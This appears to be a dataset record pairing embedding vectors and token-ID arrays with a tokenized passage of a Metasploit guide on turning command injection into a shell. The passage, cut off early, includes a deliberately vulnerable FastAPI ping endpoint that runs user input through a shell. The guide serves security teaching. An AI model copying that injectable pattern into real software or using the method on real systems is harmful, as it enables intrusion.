4.200183391571045, 0.4330291450023651, 0.43079712986946106, 0.6564624905586243, 0.27871978282928467, 0.8087037205696106, -0.0929303765296936, -0.055756576359272, 0.06680690497159958, -0.37072068452835083, 0.8278408646583557, -0.08135328441858292, 0.48534095287323, 0.40200570225715637, 0.7141701579093933, 0.3372947871685028, -0.4387912452220917, 0.03703828528523445, 0.04160282015800476, -0.8372204899787903, -1.013285756111145, 0.06103959679603577, -0.171107679605484, 0.6144872903823853, -0.05935285612940788, 0.746998131275177, 0.3439970314502716, -0.585546612739563, 0.12846297025680542, -0.8338783383369446, 0.24162866175174713, -0.0699341893196106, 0.6208577752113342, 0.1269865781068802, -0.2789629101753235, 0.3127315640449524, 0.09127618372440338, 0.20275306701660156, -0.09845416247844696, -0.2663875222206116, 0.5626121759414673, -0.12104344367980957, -0.1319974958896637, -0.06679949164390564, -0.27439671754837036, 0.8293908834457397, -0.3053356409072876, 0.31252560019493103, 0.84775710105896, 0.005388133693486452, 0.13991636037826538, 0.1545792520046234, 0.39225512742996216, -0.5095285773277283, -0.41302716732025146, 0.2936860918998718, -0.4272582232952118, -0.1499110758304596, 0.20424553751945496, 0.3849453032016754, -0.3440084755420685, -0.049065180122852325, -0.6274325251579285, 0.34669479727745056, -0.3366836607456207, 0.40540048480033875, 0.20739997923374176, 0.30210965871810913, -0.5573065280914307, -0.10969723016023636, 0.700242280960083, -0.19711045920848846, 0.06205129250884056, -0.8660883903503418, -0.46155300736427307, 0.0163397379219532, 0.15421311557292938, 0.17786042392253876, 0.4887450337409973, -0.6377690434455872, 0.4765757918357849, 0.0027681193314492702, -0.1721617430448532, -0.49141716957092285, 0.1754884123802185, 0.08713199198246002, -0.5922110676765442, -0.12600481510162354, -0.29493340849876404, 0.000205627889954485, 0.36096620559692383, 0.3566267490386963, -0.15258389711380005, -0.12147518247365952, 0.10564197599887848 ]
[ 2709, 1000, 1033, 2065, 1030, 11596, 1031, 1005, 9353, 29165, 2094, 16703, 1012, 4654, 2063, 1005, 1033, 1027, 1027, 1014, 2709, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 4242, 3449, 5332, 2546, 4638, 1035, 9495, 2709, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 2842, 2709, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 11156, 2203, 2203, 2178, 2825, 2126, 2000, 22459, 2003, 6723, 1996, 8211, 5371, 1010, 1998, 2224, 18804, 6491, 1012, 2021, 1997, 2607, 1010, 2023, 2003, 1037, 2843, 12430, 1998, 19421, 2062, 2897, 4026, 1012, 8285, 5403, 3600, 4666, 2378, 11368, 3022, 24759, 28100, 4107, 1996, 6061, 2000, 8073, 2655, 1996, 4638, 4118, 2077, 1996, 18077, 2030, 2448, 4118, 2003, 2448, 1012, 2074, 17463, 10497, 1996, 8285, 5403, 3600, 11336, 2005, 2023, 1010, 2498, 2062, 1024, 17463, 10497, 5796, 2546, 1024, 1024, 18077, 1024, 1024, 6556, 1024, 1024, 8285, 5403, 3600, 2429, 2000, 1996, 4638, 16044, 2513, 2011, 1996, 4638, 4118, 1010, 7705, 2097, 2787, 2065, 1996, 11336, 2323, 2022, 6472, 2030, 2025, 1024, 4638, 16044, 5302, 8566, 2571, 6472, 1029, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 23147, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 3544, 23147, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 11156, 23147, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 3647, 3630, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 4895, 6342, 9397, 15613, 3630, 10288, 24759, 28100, 1024, 1024, 4638, 16044, 1024, 1024, 4242, 17048, 24158, 4666, 2378, 7545, 2048, 2047, 7047, 2008, 2292, 1996, 6872, 2491, 2049, 5248, 1024, 8285, 5403, 3600, 1024, 4520, 3251, 2030, 2025, 1996, 4638, 4118, 2097, 2022, 2448, 1012, 12398, 2003, 2995, 1012, 2486, 10288, 24759, 28100, 1024, 2058, 15637, 1996, 4638, 2765, 1012, 1996, 4638, 4118, 2003, 2448, 2021, 1996, 11336, 2097, 2022, 6472, 7539, 1997, 1996, 2765, 1012, 12398, 2003, 6270, 1012, 102 ]
metasploit
108.txt
3
[CLS] if you ’ ve found a way to execute a command on a target, and you ’ d like to make a simple exploit module to get a shell, this guide is for you. alternatively, if you have access to fetch commands on the target ( curl, wget, ftp, tftp, tnftp, or certutil ), you can use a fetch payload for a no - code solution. by the end of this guide you ’ ll understand how to turn command injection into a shell - from here, you can move on to the command stager article and upgrade your basic : unix _ cmd target to a dropper for all kinds of payloads with variable command stagers. this guide assumes some knowledge of programming ( understand what a class is, what methods / functions are ) but expects no in - depth knowledge of metasploit internals. a vulnerable servicefor the vulnerable service test case, we ’ ll be using a simple fastapi service. this is very easy to spin up : install fastapi [ all ] using your preferred python package manager ( a virtual environment is recommended ) create a file to hold some python code ( i ’ ll call it main. py ) copy the following code into your file : from fastapi import fastapi, response import subprocess app = fastapi ( ) @ app. get ( " / ping " ) def ping ( ip : str ) : res = subprocess. run ( f " ping - c 1 { ip } ", shell = true, capture _ output = true ) return response ( content = res. stdout. decode ( " utf - 8 " ), media _ type = " text / plain " ) start your vulnerable service with uvicorn main : apptest that the application works with curl : $ curl url ping 1. 1. 1. 1 ( 1. 1. 1. 1 ) 56 ( 84 ) bytes of data. 64 bytes from 1. 1. 1. 1 : icmp _ seq = 1 ttl = 58 time = 16. 7 ms - - - 1. 1. 1. 1 ping statistics - - - 1 packets transmitted, 1 received, 0 % packet loss, time 0ms rtt min / avg / max / mdev = 16. 739 / 16. 739 / 16. 739 / 0. 000 ms test that your application is exploitable - also with curl : $ curl local
[ 0.04093549773097038, 0.09658125787973404, -0.6991227269172668, 0.9293885231018066, -0.6902542114257812, -0.23408709466457367, -0.38654229044914246, 0.46648311614990234, 0.3126743733882904, 0.7126397490501404, -0.12768706679344177, 0.2577379643917084, 0.6060956716537476, -0.7781801223754883, -0.3702254593372345, -0.30750197172164917, -0.11048063635826111, -0.37724733352661133, -1.2394531965255737, -0.08064943552017212, 0.23530226945877075, -0.3982737064361572, -0.3642147481441498, -0.6422993540763855, 0.16209295392036438, 0.14559295773506165, -0.09572578966617584, -0.3420272469520569, 0.3747004270553589, 0.5914719700813293, 0.47154250741004944, 0.039920590817928314, 0.14847172796726227, -0.4504272937774658, 0.37947869300842285, -0.3237510621547699, 0.172792449593544, -0.4073540270328522, -0.15524260699748993, -0.7743246555328369, 0.6320242881774902, -0.21592414379119873, -0.320656418800354, -0.29636621475219727, -0.48337966203689575, -0.07327955961227417, 0.4120911955833435, -0.2545080780982971, 0.3446917235851288, 0.13393457233905792, 0.3592228889465332, 0.604349672794342, -0.16409161686897278, 0.49834534525871277, -0.1861584335565567, -0.16992469131946564, -0.4537842869758606, -0.2362736463546753, -0.3503064811229706, 0.042690128087997437, -0.23441572487354279, 0.16139493882656097, -0.1520744413137436, -0.82777339220047, -0.3409523367881775, 0.22628997266292572, -0.2040490359067917, -0.1656688004732132, -0.07969899475574493, -0.7941688895225525, -0.7404212355613708, 0.8068854212760925, -0.308264821767807, -0.8351505994796753, -0.18436570465564728, 0.09230729192495346, 0.3445627689361572, -0.542769730091095, -0.7287655472755432, 0.7987574338912964, -0.35118329524993896, 0.41354748606681824, 0.20169290900230408, -0.17301185429096222, 0.24344319105148315, -0.5568028092384338, 0.6666910648345947, 0.6239235401153564, -0.2799181044101715, 0.41219112277030945, 0.381592720746994, 0.263163685798645, -0.6259437799453735, -0.19477732479572296, 0.3262491226196289, 0.2223348617553711, -0.2648437023162842, 0.15238112211227417, 0.26061227917671204, -0.4090057611465454, 0.5572465062141418, 0.6351889371871948, 0.09126042574644089, 0.27144598960876465, -0.1966884583234787, 0.45925843715667725, 0.4886862635612488, -0.4927254319190979, -0.26410233974456787, -0.312383234500885, 0.4599117934703827, -0.00473107909783721, -0.023988233879208565, -0.9828811883926392, -0.28728845715522766, 0.016764353960752487, 0.5606194734573364, -0.07309234887361526, -0.5940560102462769, 0.9817994832992554, -0.26027342677116394, -0.3356824815273285, 0.34993240237236023, -0.34072989225387573, 0.11695663630962372, -0.2226930409669876, 0.25467243790626526, 0.5509054064750671, -0.9672768115997314, -0.2622895836830139, -0.33559349179267883, -0.09547628462314606, 0.2636522948741913, 0.8137292861938477, -0.29454687237739563, 0.34277239441871643, -0.08540602773427963, -0.06684938073158264, 1.4571832418441772, -0.3931439220905304, -0.6116394400596619, -0.09404962509870529, 0.4090547263622284, 1.4367049932479858, -0.3199154734611511, -0.1927555352449417, -0.08089686930179596, -0.1682601422071457, -0.17797459661960602, 0.28987929224967957, -0.06406491994857788, -0.16495616734027863, 0.32547932863235474, -0.14314469695091248, -0.2336602360010147, 0.4148775041103363, -0.034099116921424866, 0.6259922385215759, 0.057779695838689804, -0.006840039044618607, -0.14127150177955627, 0.601749837398529, -0.0475495271384716, 0.20749519765377045, -0.32675302028656006, 0.5732175707817078, -0.6614166498184204, -0.3575901985168457, -0.23608282208442688, 0.26117247343063354, 0.8962110877037048, -0.2020585983991623, 0.020434798672795296, 0.5119881629943848, 1.3544394969940186, 0.9511796832084656, 0.1868649125099182, -0.014819901436567307, 0.11446751654148102, 0.2296859323978424, -0.6697348356246948, 0.9186918139457703, 0.5341309905052185, 0.7378597259521484, 0.7124807238578796, 0.20054829120635986, 0.3263501822948456, -0.41584551334381104, 0.09384409338235855, 0.2256212681531906, -0.3068171441555023, 0.8536015152931213, -0.43660756945610046, 0.13356292247772217, 0.11772328615188599, 0.15491020679473877, -0.632819652557373, 0.5393980145454407, -0.24506798386573792, -0.9715691208839417, -0.7037226557731628, 0.3300420343875885, -0.09026851505041122, 0.2738859951496124, -0.3288814127445221, -0.6552691459655762, 0.4733591377735138, 0.39633476734161377, -0.10623980313539505, 0.11595551669597626, 0.7159441113471985, 0.02619977481663227, -0.6674953699111938, -0.18059970438480377, -0.08853695541620255, 0.42517444491386414, -0.6183876991271973, 0.1417979598045349, 0.250886470079422, 0.12963978946208954, -0.009727336466312408, 0.65458083152771, 0.5783913135528564, 0.05522995442152023, -0.020645592361688614, -0.8971505761146545, -0.21016593277454376, 0.26574525237083435, -0.3251667022705078, -0.10149482637643814, -0.48685765266418457, 0.01532815769314766, -0.11354770511388779, 0.6651437282562256, 0.3163798153400421, -0.0551442876458168, 0.3768816590309143, 0.33730143308639526, -0.30300432443618774, 0.4507918655872345, 0.58743816614151, 1.0191913843154907, 0.2469382882118225, 0.3259216845035553, 0.2437540739774704, 0.20003235340118408, 0.14852547645568848, 0.06963644176721573, -0.0800575315952301, 0.9000810980796814, -0.695663571357727, 0.7975017428398132, 0.5174890756607056, -0.27092304825782776, -0.4116983711719513, -0.3864504098892212, 0.23202036321163177, 0.19984720647335052, -0.9569367170333862, -0.7060542106628418, 0.12573164701461792, -0.33500152826309204, -0.26856085658073425, 0.10413605719804764, 0.025967469438910484, 0.979529619216919, -0.22021259367465973, 0.34001460671424866, 0.002827777760103345, 0.26793521642684937, -0.7696661353111267, -0.1341979056596756, -0.635330080986023, -0.5502378940582275, -0.49821901321411133, 0.05802513286471367, -0.1865134835243225, 0.046002086251974106, 0.10038146376609802, -0.5250247716903687, -0.9245429635047913, 0.4116556942462921, 0.7488706707954407, 0.789862871170044, -0.010697285644710064, 0.0788317546248436, -0.6327913999557495, -0.054522573947906494, -0.33625084161758423, 0.31013602018356323, 0.0526411235332489, -0.0986790657043457, -0.14675913751125336, -0.12546652555465698, -0.16401009261608124, -0.16801735758781433, 0.5796744227409363, 0.24239099025726318, 0.2644141614437103, 0.17906635999679565, -0.12269103527069092, -0.39423656463623047, 0.5765329599380493, 0.16959750652313232, -0.528425931930542, 0.5102523565292358, -0.0325990654528141, 0.10720931738615036, 0.7763348817825317, 0.501347005367279, -0.7496951818466187, 0.7322667241096497, -0.46588966250419617, 0.2593877911567688, -0.5598644018173218, 0.6418960094451904, 0.4018990695476532, 0.007875167764723301, -0.042162470519542694, -0.8824737071990967, 0.42760929465293884, -0.017240144312381744, 0.03856690600514412, -0.5008492469787598, -0.5861049294471741, 0.180422842502594, -0.42708027362823486, -0.5039839148521423, 0.18339088559150696, -0.5243692398071289, -0.05562780052423477, 0.04148432984948158, -0.2083265632390976, 0.37540215253829956, 0.2643406093120575, 0.09862443059682846, -0.5301464796066284, -0.234658882021904, -0.076912060379982, 0.13039399683475494, -0.21825221180915833, -0.6887156963348389, 0.7775118947029114, 0.38770368695259094, -0.042875997722148895, 0.5289788842201233, 0.7208187580108643, -0.5618069171905518, 0.019070062786340714, -0.06115816906094551, -0.28028586506843567, 0.08629658073186874, 0.0514301061630249, 0.5306271910667419, 0.19304072856903076, 1.227059006690979, -0.7449632883071899, -0.47054365277290344, 0.5138137936592102, 0.2559170126914978, -0.08320292085409164, -0.32140854001045227, -0.02447293885052204, 0.05316409096121788, -0.5755125284194946, -0.15997503697872162, 0.48509714007377625, 0.3201960325241089, 0.3014526069164276, 0.09258834272623062, 0.6210511326789856, 0.38427072763442993, -0.08763086795806885, 0.1644020974636078, -0.48982176184654236, -0.8325612545013428, 0.6147392392158508, 0.2659839391708374, 0.4392828345298767, -0.2655542492866516, 0.20210690796375275, -0.05121917650103569, 0.2462891936302185, 0.25417396426200867, 0.4854438602924347, -0.570014476776123, -0.4014357328414917, -0.20652228593826294, 0.09600811451673508, 0.2523764669895172, -0.11108285188674927, 0.14087620377540588, 0.84963059425354, -0.15416446328163147, -0.7140058279037476, -0.9017065167427063, 0.2517416775226593, 1.0956240892410278, 0.7195041179656982, 0.631709098815918, 0.41575372219085693, -0.04027481749653816, -0.7220584154129028, 0.19380760192871094, -0.3531232476234436, 0.10787730664014816, -0.12815815210342407, 0.2829212248325348, -0.17768928408622742, 0.4271935224533081, 0.16529609262943268, -0.00549913477152586, -0.24211551249027252, 0.007554711773991585, -0.39688822627067566, -0.3012621998786926, -0.677768349647522, 0.071111761033535, 0.46065419912338257, 0.0965881273150444, -0.27128228545188904, -0.8530929684638977, -0.3082970380783081, 0.603891134262085, 0.8118453025817871, -0.8718119263648987, -0.6157312393188477, -0.5006311535835266, -0.08482726663351059, -0.27914345264434814, -0.2556077241897583, -0.14453919231891632, -0.6995319128036499, -0.24059659242630005, -0.8969975113868713, 0.3137151598930359, 0.5975600481033325, 0.19560585916042328, -0.13464711606502533, -0.9619417786598206, -0.07388228923082352, 0.374784380197525, -0.09447699785232544, -0.7005011439323425, -0.4482519328594208, 0.3832840025424957, 0.5327576398849487, 0.26154154539108276, -0.5541394948959351, -0.278632253408432, -0.25666511058807373, -0.647513210773468, 0.5784110426902771, -0.6572346687316895, 0.4618615508079529, 0.46544840931892395, -0.051615241914987564, -0.06226256117224693, -0.03401812165975571, -0.09240970015525818, -0.3426778316497803, -0.5694810748100281, 0.25406068563461304, -0.6321360468864441, 0.036633506417274475, 0.5865923762321472, -0.28404223918914795, 0.02664923667907715, 0.5866265892982483, 0.1209222823381424, -0.10642650723457336, 0.36902496218681335, 0.12975013256072998, -0.6566523909568787, 0.03507571294903755, -0.21869365870952606, 0.7867349982261658, 0.28666993975639343, 0.34803691506385803, -0.1879870593547821, -0.33884361386299133, 1.0947926044464111, 0.14994391798973083, -0.024966128170490265, -1.0245851278305054, -0.6198517680168152, 0.37345588207244873, 0.4549613893032074, -0.08579088747501373, 0.19361284375190735, -0.04324435070157051, -0.45959481596946716, -0.07582981884479523, -0.49811574816703796, -0.7800168991088867, -0.7062073945999146, 0.03960597887635231, -0.3053288459777832, 0.3483639061450958, 0.27937909960746765, 0.6030415892601013, -0.5689281225204468, -0.6482218503952026, 0.2069113403558731, -0.6318409442901611, -0.14440254867076874, -0.6686643958091736, -0.13149185478687286, -0.10183975100517273, 0.1287735253572464, -0.3496531546115875, 0.09670215845108032, -0.6116155982017517, 0.02718990668654442, 0.3683525323867798, 0.4677599370479584, 0.4886572062969208, -0.3523741364479065, -0.7671161890029907, 0.3948642313480377, -0.10254190862178802, -0.41880422830581665, -0.17400984466075897, 0.06668257713317871, 0.030168741941452026, 0.24999959766864777, -0.29230254888534546, -0.40736132860183716, -0.8892091512680054, -0.9929017424583435, 0.2566256821155548, -0.4353073835372925, 0.03673819079995155, -0.4743550419807434, -1.1902308464050293, -0.2581707537174225, 0.3385169804096222, 0.49245092272758484, -1.290040135383606, -0.14983336627483368, -0.19687943160533905, -0.15560615062713623, -0.14547134935855865, 0.03068830445408821, -0.10991592705249786, -0.8421677350997925, -0.6342172622680664, 0.6577473282814026, 0.2742699384689331, -0.13638612627983093, -0.6922727227210999, 0.6564631462097168, 0.42366302013397217, 0.3376532793045044, -0.5992464423179626, -0.2317994385957718, -0.4832071363925934, 0.07816572487354279, -0.6269509792327881, 0.6057273745536804, -0.8430457711219788, 0.6566502451896667, 0.1712101697921753, 0.30384308099746704, -0.3081997036933899, 0.03292607143521309, -0.19287008047103882, 0.2455420047044754, 0.6375830173492432, -0.33832278847694397, 0.5138319730758667, -0.356916218996048, 0.6836751699447632, -0.008151421323418617, -0.036945734173059464, -0.9024151563644409, 0.11881334334611893, -0.7148435711860657, -0.7855926752090454, 0.8381654620170593, -0.3141235411167145, -0.3666629195213318, 0.25653108954429626, -0.1520238220691681, 0.5485252141952515, -0.7461672425270081, 0.6096954941749573, 0.9547953009605408, -0.08617564290761948, 0.6214698553085327, -0.8817185759544373, 0.7799195647239685, 0.6631434559822083, -0.25078627467155457, 0.31066662073135376, 0.2290308177471161, 0.555580735206604, -0.5205413103103638, -0.27647632360458374, -0.06900927424430847, -0.03499436751008034, -0.48404741287231445, 0.5265100002288818, -0.2875433564186096, 0.5136218070983887, 0.18557317554950714, -0.30590423941612244, -0.6123044490814209, 0.21132314205169678, 0.7133194208145142, 0.026288505643606186, 0.05924519523978233, 0.8611454963684082, 0.2986111640930176, -0.5435526967048645, 0.12984143197536469, 0.02637501060962677, -0.1925237625837326, 0.3777948021888733, 0.32701677083969116, -0.7672024369239807, 0.9474185109138489, 0.3877008557319641, -0.6747129559516907, -0.7549624443054199, -0.8031023740768433, -0.2990240752696991, 0.08543797582387924, 0.05266925320029259, -0.7474794387817383, -0.14167943596839905, 0.01832686737179756, 0.7547571063041687, 0.5290329456329346, -0.24968448281288147, -0.1041332334280014, -0.6658584475517273, 0.3197578191757202, -0.19346050918102264, 0.31125298142433167, 0.811839759349823, -0.45332229137420654, -0.4705737233161926, -1.0979489088058472, -0.13483944535255432, 0.4658879041671753, 0.32030972838401794, 1.086431622505188, -0.21919454634189606, 0.765870213508606, -0.33631742000579834, -0.14282995462417603, 1.0988508462905884, -0.4537924826145172, 0.24290654063224792, 0.8129405379295349, -0.6258134841918945, -0.3480890393257141, -0.6247510313987732, 0.06661878526210785, -0.1479881852865219, 0.7597796320915222, 0.7345419526100159, -0.01246892660856247, -0.026264216750860214, -0.12387140095233917, -0.3362964391708374, -0.6000229120254517, -0.1633526086807251, -0.7757457494735718, -0.6194431185722351, -0.03592252731323242, -0.13931545615196228, 0.34823334217071533, -0.2383543699979782, -0.31339743733406067, -0.6134732365608215, -0.49613526463508606, 0.19784189760684967, 0.1498599648475647, -0.423267126083374, -0.49252423644065857, 0.1614551693201065, -1.0297762155532837, -0.8169166445732117, -0.6553012132644653, -0.11614478379487991, -0.3307223916053772, -0.5090008974075317, -0.14864957332611084, 0.14379508793354034, -0.7248274683952332, 0.31069448590278625, 0.011833075433969498, -0.07224613428115845, 0.08626580238342285, -0.9520244598388672, 0.07791415601968765, 0.5643875002861023, -1.0319790840148926, 0.3278648257255554, -0.485955148935318, -0.6586040258407593, 0.41525810956954956, -0.17070873081684113, 0.07158741354942322, 0.01596243493258953, 0.26396602392196655, 0.7246782183647156, -0.11655783653259277, -0.6586093306541443, 0.03923249617218971, 0.39303305745124817, -0.5442389845848083, 0.38564833998680115, -0.6167830228805542, -0.42755159735679626, 0.09616735577583313, -0.14776749908924103, 0.3610481917858124, 0.6900890469551086, 0.3694378435611725, 0.42466840147972107, -0.5270580053329468, 0.6056239008903503, 0.5867400765419006, 0.276606947183609, -0.24843928217887878, -0.07276137173175812, -0.0502980537712574, -0.19105742871761322, 0.24017487466335297, 1.1136443614959717, -0.25048062205314636, 0.1262117475271225, 0.1384861022233963, -0.20511633157730103, -0.5663160085678101, -0.23680269718170166, -0.4305952489376068, 0.421015202999115, -0.13983267545700073, 0.0751151293516159, 0.3663930892944336, 0.16976648569107056, -0.21933040022850037, -0.13223417103290558, -1.020673394203186, 0.13728007674217224, 0.05130232125520706, -0.48320120573043823, -0.1725555658340454, -0.14820082485675812, -0.15331535041332245, -0.6943345665931702, -0.008437561802566051, 0.00525133078917861, 0.527929425239563, -0.43340378999710083, 0.12291264533996582, 1.2029719352722168, -0.6473548412322998, -0.5032597780227661, -0.3467257618904114, 0.38411954045295715, -0.9071276187896729, -1.175329566001892, 0.19610294699668884, 1.369587779045105, -0.2041682004928589, -0.024860339239239693, -0.6358294486999512, 0.12514027953147888, 0.2773878276348114, 0.04749607667326927, -0.24165582656860352, 0.4660111665725708, -0.4407097399234772, 0.5145995020866394, -0.32826435565948486, 0.30167317390441895, -0.042446866631507874, -0.12857630848884583, 0.06396038830280304, -0.10686526447534561, -0.4511684775352478, 0.17996524274349213, -0.058345094323158264, 0.20464970171451569, 0.6785359978675842, 0.6346406936645508, 0.24283640086650848, -0.4171748161315918, -0.12545324862003326, -0.584018349647522, 0.2664220929145813, 0.4072249233722687, 0.5625635981559753, 0.24171437323093414, 0.6950273513793945, 0.3203028738498688, -0.837460458278656, -0.4990238547325134, 0.42067089676856995, 0.3159332871437073, -0.15288423001766205, 0.5455936789512634, -0.6249801516532898, 0.11666072905063629, -0.2707299590110779, -0.19015248119831085, 0.3116855323314667, -0.06515643745660782, 0.456101655960083, -0.014069046825170517, -0.11907853186130524, 0.3902149796485901, -0.7954893708229065, 0.39658123254776, 0.5946475267410278, -0.3558993339538574, 0.6625728011131287, 0.0765751376748085, -0.5539650321006775, 0.16453313827514648, 1.0148321390151978, 0.7618831992149353, -0.0710173174738884, 0.3652385473251343, -0.16337275505065918, 0.4722646474838257, 0.19202755391597748, -0.10713806748390198, -0.8839300870895386, 0.2503325343132019, 0.46334540843963623, -0.19614697992801666, -0.5017401576042175, 0.471118301153183, 0.41238799691200256, -0.14530706405639648, 0.629630982875824, -0.040709514170885086, -0.09369093924760818, -0.6648528575897217, 0.6031736731529236, 0.028920086100697517, 0.18696802854537964, -0.010578332468867302, -0.3911370038986206, -0.8925995826721191, 1.138832926750183, 0.06383036822080612, 0.30908796191215515, 0.12994559109210968, 1.1515485048294067, -0.30404937267303467, 0.5333916544914246, 0.2734789550304413, -0.5157627463340759, -0.44816187024116516, 0.24836476147174835, -0.29062187671661377, -0.32784798741340637, 0.3244416415691376, -0.03001546300947666, 0.36646392941474915, -0.5800666213035583, -0.35119906067848206, -0.42609214782714844, 0.41910895705223083, -0.19959445297718048, -0.9808962941169739, 0.30668506026268005, -0.0640927255153656, -0.5520616173744202, -0.0982275977730751, 0.5311214923858643, 0.6584748029708862, 0.47814488410949707, -0.18189293146133423, -0.46059900522232056, -0.46688443422317505, 0.046103548258543015, -0.36026182770729065, 0.6294023990631104, -0.30991706252098083, -0.3481937348842621, 0.24297255277633667, -0.37298130989074707, 0.016632720828056335, 0.3438984453678131, -0.6664308905601501, -0.21825525164604187, 0.40150272846221924, 0.4757702350616455, 1.0800633430480957, 0.1683056503534317, 0.373271644115448, -0.05006431043148041, 0.1456364542245865, 0.8727499842643738, -0.0982690155506134, 0.5263605713844299, 0.10202302038669586, -0.038311827927827835, 0.24704504013061523, -0.2601168155670166, 0.2736688554286957, -0.29541075229644775, 0.06609469652175903, 0.09211184084415436, 0.22983425855636597, -0.8894414305686951, -0.3562336564064026, 0.034871604293584824, 0.023733479902148247, 0.40437233448028564, -0.0023179759737104177, -0.6569547653198242, 0.07628313452005386, -0.6956446766853333, -0.1302858144044876, -0.06346508115530014, -0.057792793959379196, -0.2959422469139099, -0.21893824636936188, 0.5010562539100647, -0.6354808211326599, 4.517249584197998, -0.07230488210916519, 0.34169262647628784, -0.09134795516729355, 0.3190031051635742, 0.38733339309692383, 0.723042368888855, -0.49698328971862793, 0.27742257714271545, -0.7039680480957031, 0.07161182910203934, -0.47099462151527405, 0.1649979054927826, 0.5982561111450195, 0.49515464901924133, -0.027461020275950432, -0.47058889269828796, 0.34725695848464966, 0.44831541180610657, -0.700888991355896, -0.637459397315979, 0.17880204319953918, -0.30745258927345276, 1.3262420892715454, 0.4167083501815796, 0.28000912070274353, 0.1966763436794281, -0.8193289041519165, 0.34106162190437317, -0.7092500925064087, -0.17179538309574127, -0.25210708379745483, 0.5651086568832397, 0.11315664649009705, -0.2777009606361389, 0.000732493179384619, 0.025231432169675827, -0.5976942181587219, -0.30150261521339417, -0.9146651029586792, 0.6906677484512329, 0.05994604527950287, -0.07936692237854004, -0.1262788325548172, 0.08480069786310196, 0.4501813054084778, -0.6176559925079346, 0.5791718363761902, 0.9101589918136597, -0.9412679076194763, 0.2443251609802246, -0.04291016608476639, 0.7806911468505859, -0.009323479607701302, -1.2841681241989136, 0.39858436584472656, 0.27321016788482666, -0.31952163577079773, -0.07566908746957779, 0.1824897825717926, 0.7542036175727844, -0.5103284120559692, 0.009240897372364998, 0.05953317880630493, -0.36706462502479553, 0.04693685844540596, -0.547228991985321, 0.36675503849983215, -0.04219081997871399, 0.5029017329216003, -0.29287028312683105, 0.13771504163742065, -0.2761678397655487, -0.5268499851226807, 1.0423247814178467, -0.1478491574525833, 0.1840967983007431, 0.24797415733337402, 0.29758453369140625, -0.38787293434143066, -0.4880327582359314, -0.4443935751914978, -1.5311988592147827, 0.950549304485321, 0.5411025881767273, 0.3490898311138153, -0.09319745004177094, -0.9849746227264404, -0.24241037666797638, 0.3289893567562103, 0.39969441294670105, 0.86599200963974, -0.9308047890663147, 0.6270100474357605, 0.2966327667236328 ]
[ 101, 2065, 2017, 1521, 2310, 2179, 1037, 2126, 2000, 15389, 1037, 3094, 2006, 1037, 4539, 1010, 1998, 2017, 1521, 1040, 2066, 2000, 2191, 1037, 3722, 18077, 11336, 2000, 2131, 1037, 5806, 1010, 2023, 5009, 2003, 2005, 2017, 1012, 14084, 1010, 2065, 2017, 2031, 3229, 2000, 18584, 10954, 2006, 1996, 4539, 1006, 15390, 1010, 1059, 18150, 1010, 3027, 2361, 1010, 1056, 6199, 2361, 1010, 28286, 6199, 2361, 1010, 2030, 8292, 5339, 21823, 2140, 1007, 1010, 2017, 2064, 2224, 1037, 18584, 18093, 2005, 1037, 2053, 1011, 3642, 5576, 1012, 2011, 1996, 2203, 1997, 2023, 5009, 2017, 1521, 2222, 3305, 2129, 2000, 2735, 3094, 13341, 2046, 1037, 5806, 1011, 2013, 2182, 1010, 2017, 2064, 2693, 2006, 2000, 1996, 3094, 2754, 2099, 3720, 1998, 12200, 2115, 3937, 1024, 19998, 1035, 4642, 2094, 4539, 2000, 1037, 4530, 4842, 2005, 2035, 7957, 1997, 18093, 2015, 2007, 8023, 3094, 2754, 2869, 1012, 2023, 5009, 15980, 2070, 3716, 1997, 4730, 1006, 3305, 2054, 1037, 2465, 2003, 1010, 2054, 4725, 1013, 4972, 2024, 1007, 2021, 24273, 2053, 1999, 1011, 5995, 3716, 1997, 18804, 13102, 4135, 4183, 4722, 2015, 1012, 1037, 8211, 2326, 29278, 1996, 8211, 2326, 3231, 2553, 1010, 2057, 1521, 2222, 2022, 2478, 1037, 3722, 3435, 9331, 2072, 2326, 1012, 2023, 2003, 2200, 3733, 2000, 6714, 2039, 1024, 16500, 3435, 9331, 2072, 1031, 2035, 1033, 2478, 2115, 6871, 18750, 7427, 3208, 1006, 1037, 7484, 4044, 2003, 6749, 1007, 3443, 1037, 5371, 2000, 2907, 2070, 18750, 3642, 1006, 1045, 1521, 2222, 2655, 2009, 2364, 1012, 1052, 2100, 1007, 6100, 1996, 2206, 3642, 2046, 2115, 5371, 1024, 2013, 3435, 9331, 2072, 12324, 3435, 9331, 2072, 1010, 3433, 12324, 4942, 21572, 9623, 2015, 10439, 1027, 3435, 9331, 2072, 1006, 1007, 1030, 10439, 1012, 2131, 1006, 1000, 1013, 17852, 1000, 1007, 13366, 17852, 1006, 12997, 1024, 2358, 2099, 1007, 1024, 24501, 1027, 4942, 21572, 9623, 2015, 1012, 2448, 1006, 1042, 1000, 17852, 1011, 1039, 1015, 1063, 12997, 1065, 1000, 1010, 5806, 1027, 2995, 1010, 5425, 1035, 6434, 1027, 2995, 1007, 2709, 3433, 1006, 4180, 1027, 24501, 1012, 2358, 26797, 2102, 1012, 21933, 3207, 1006, 1000, 21183, 2546, 1011, 1022, 1000, 1007, 1010, 2865, 1035, 2828, 1027, 1000, 3793, 1013, 5810, 1000, 1007, 2707, 2115, 8211, 2326, 2007, 23068, 11261, 6826, 2364, 1024, 10439, 22199, 2008, 1996, 4646, 2573, 2007, 15390, 1024, 1002, 15390, 24471, 2140, 17852, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1006, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1007, 5179, 1006, 6391, 1007, 27507, 1997, 2951, 1012, 4185, 27507, 2013, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 1024, 24582, 8737, 1035, 7367, 4160, 1027, 1015, 23746, 2140, 1027, 5388, 2051, 1027, 2385, 1012, 1021, 5796, 1011, 1011, 1011, 1015, 1012, 1015, 1012, 1015, 1012, 1015, 17852, 6747, 1011, 1011, 1011, 1015, 23730, 11860, 1010, 1015, 2363, 1010, 1014, 1003, 14771, 3279, 